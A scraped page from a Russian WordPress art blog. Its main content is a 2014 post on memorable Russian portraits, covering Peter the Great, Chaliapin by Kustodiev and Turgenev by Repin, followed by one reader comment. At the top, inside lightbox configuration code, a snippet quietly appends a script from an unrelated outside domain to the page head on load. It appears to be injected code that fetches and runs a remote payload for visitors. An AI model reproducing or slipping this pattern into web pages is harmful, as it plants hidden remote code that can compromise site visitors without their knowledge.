, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Портрет личности

Автор: Дмитрий Алмазов | 24 Мар 2014

Портрет личностиПортрет личности - это отображение духовного и физического состояния человека. Можно взглянуть на полотно, и сразу становится ясно, какой перед нами человек: исторический деятель, известный певец или писатель. В русском искусстве существует много портретов личности. Давайте познакомимся с  самыми запоминающимися, на мой взгляд, полотнами.

Во-первых, это портрет первого русского императора-Петра Первого работы Жан-Марка Натье.
Этот жанр появляется в 18 веке. В то далекое время на русской земле не было художников, работающих в этом жанре. Петр Алексеевич привез в Россию художников-портретистов. Как раз одним из них был Жан-Марк Натье. Он смог отобразить знаменитого "медного всадника" во всем величии. Натье передал могучий лоб императора, большие, полные будущих планов и азарта, глаза; больший камзол Петра заставляет почувствовать мощь и силу властителя судеб. С помощью синих, золотых, бордовых цветов передается яркий порыв всех идей и мыслей императора. Посмотреть воочию данное полотно можно в  Музее Резиденции, Мюнхен.

Портрет личностиВо-вторых, познакомимся еще с одной личностью. Федор Иванович Шаляпин. Работа знаменитого художника Кустодиева. Зимний, пестрый пейзаж гармонирует с барином русской оперы. Шаляпин представлен статным мужчиной в прекрасном пальто иссиня-черного цвета и русской меховой шапке. Посмотришь, и на ум приходит мысль, что перед тобой великая личность! Личность певца проявляется не в глазах, не в очертаниях лицах, а в позе и постановке тела. Поза-это вызов, вызов всему окружающему миру, который посылает в атмосферу эгоцентрические настрои. Авангардистская пропись Кустодиева еще больше подчеркивает эгоцентризм русского соловья. Яркая личность гармонирует с яркими красками полотна, играет полутонами и бликами, и существует в особом, собственном, мире. Получше рассмотреть Фёдора Ивановича вы сможете в Третьяковской галереи на Крымском валу.

В-третьих, сколько портретов писателей существует в нашем искусстве! Каждый из них по-своему прекрасен, но существуют такие портреты, о которых стоит постоянно и постоянно помнить. В русском живописи "писательскими портретистами" были Репин и Серов. Я предлагаю познакомиться с портретом работы Репина. Ведь именно он обогнал Портрет личностисвоего коллегу в портретном превосходстве. Самая яркая работа художника - это портрет писателя Тургенева. Писатель запечатлен в сидячем положении. По всем правилам реализма образ выполнен с четкой прописью, которая отображает даже мимолетные мысли литературного деятеля. В портрете преобладают холодные тона: благородный зеленый, богатый черный и  неяркий золотой. Данные тона передают осеннее настроение. Картина написана осенью и, возможно, именно поэтому имеет такое притягательное очарование самого красивого времени года. Картину мы можете увидеть в Третьяковской галерее.

Итак, портрет - это не просто изображение человека, но и отражение его внутреннего мира. Портрет, как и человеческие глаза, зеркало души.

Темы: Портрет, Художник | 1 отзыв »

Один отзыв на “Портрет личности”

  1. Лики пишет:
    27 Мар 2014 в 21:03

    Спасибо за детальную историческую справку! по данной статье можно отследить развитие портрета личности в русском изобразительном искусстве. Еще мне понравилась четко прослеженная подборка по писателям, артистам и императорам, из которых, в примерах нам были представлены лучшие картины.

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress